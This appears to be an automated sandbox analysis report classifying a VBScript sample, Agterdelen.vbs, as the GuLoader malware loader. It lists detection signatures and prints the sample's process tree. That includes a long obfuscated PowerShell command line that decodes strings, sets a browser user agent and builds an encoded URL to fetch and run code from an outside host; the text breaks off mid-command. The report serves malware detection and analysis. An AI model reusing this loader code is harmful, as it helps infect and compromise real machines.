Windows
Analysis Report
Agterdelen.vbs
Overview
General Information
Detection
GuLoader
Score: | 96 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7832 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Agter delen.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 8104 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "Get-Servi ce;$Thicks kulled='fu nc';Get-Hi story;$Thi ckskulled+ ='t';Get-H istory;$Th ickskulled +='i';$Hyl debusk=Get -History;$ Thickskull ed+='on:'; (ni -p $Th ickskulled -n Centra lkomites - value { pa ram($Toend erne);$Udl aansafdeli ngerne=5;d o {$Hypers onically78 +=$Toender ne[$Udlaan safdelinge rne];$Udla ansafdelin gerne+=6} until(!$To enderne[$U dlaansafde lingerne]) $Hypersoni cally78}); ConvertTo- Html;(ni - p $Thicksk ulled -n D esiodothyr oxine3 -va lue {param ($Yodhs);. ($Likrer) ($Yodhs)}) ;ConvertTo -Html;$Pro tozoal=Cen tralkomite s 'UdhunNA andseH lvf TKnowi.Syg ehw';$Prot ozoal+=Cen tralkomite s 'Tra.pe Ng eBGee.s cStannl es pIWeekeESk rumNOve,ft ';$Affalds behandling ssystem=Ce ntralkomit es 'StensM SuitoTapw ozPlatfivi derlRooinl kogla Gal m/';$Humps =Centralko mites 'Unt ,rT b ralS howes ksko 1I ter2';$ Personnumm ers='Natur [ Mor.NPaa eEMondoTE ll c.Audio sSuperEDir keRTilkmvK orreiAl ef cPyramEBrr espApproOA ssorIu vis NWhi ktInt egm per aG rievn ddan AfortrGFre mhEFren rS outf]Hellb : Hove: en sesEngulER .novcS wde U PostrAca deIElytrTA vedrySoejl pPardyRCod eboBassiTD eteko Ferm c Utm.Ou d erl Un,e=G ener$Unenc HUdkraU po nsmAbeskpC heaps';$Af faldsbehan dlingssyst em+=Centra lkomites ' Re.ym5 Me e. Re a0Ci vil Basha( ,idsnWFjor ti umlinA prodKileso M.gilwIlle gsGonad Pa raNFaculTR sle B try 1 Tita0 Ne ut.Restr0U mora;Disv Wan lWStim uiHjertnUn te 6Medbo4 Mudst;Udst y Keciax b ill6 ava4w icki;Lagri hawmrHunc hvCbest:if rer1ingse3 Nasio4S,em a.udla 0Ta bli)unalc RevolGFaaf eEquipcQu in,kSphaeo Gru / Cra m2 Husa0 U .ya1 Week0 T old0Herm .1Blast0Mi lli1Therm FortjFDuff aiLbeilrEb erteHarmlf ,sychoTrig oxchemo/Bi hen1Ba.al3 Fo pa4bina r. etst0'; $Transcult uration=Ce ntralkomit es 'Skinnu SkilSUnin geFo.terLa vem-c eatA TrochG nru lE EkstnUd artT';$Bri ggsk116=Ce ntralkomit es ' Disch Saigat L.t ttBundfpAn he :Absfa/ Flaa/Dr v e6Sconc8 E va..k bel1 arss6No p a8Marab.Ra a e2P,ove2 Musee3 Ska m.Adiap1 G yno0Dv gb8 U rep/ She lJUdlovDL the/CobalG J ngaoDrew rsStealsVe .daiRibonp KorpseProg rrBobecsHa nsa.Reopet am ryoWeak mc';$Aftgt sydelser=C entralkomi tes ' pist >';$Likrer =Centralko mites 'Ryk keiIsthmEP ermix';$Hy posynergia ='Sprngnin gseksperte ns';$Konsi gneres='\D iscoach.Im m';Desiodo thyroxine3 (Centralk omites '.l oms$ Upsog HimmeL Gus hOVand,bLa bioABriseL Reinf: Ove A Buskf.o rgeg SeldI S,rivVAcr tEDoodaLGy p ySRu,ddE Eu,ognInso rS Penu=En doc$Spen,E Pol tN Blo mVScumm: B ordA .bysP QuinapAfsk rdBlamia I nfiTLitmua Brod+Dona t$PrintKDu .niofr naN FishlsBego rIUm.rsgPi cklnAsthoe TagdkrHjsp neTube S') ;Desiodoth yroxine3 ( Centralkom ites 'tho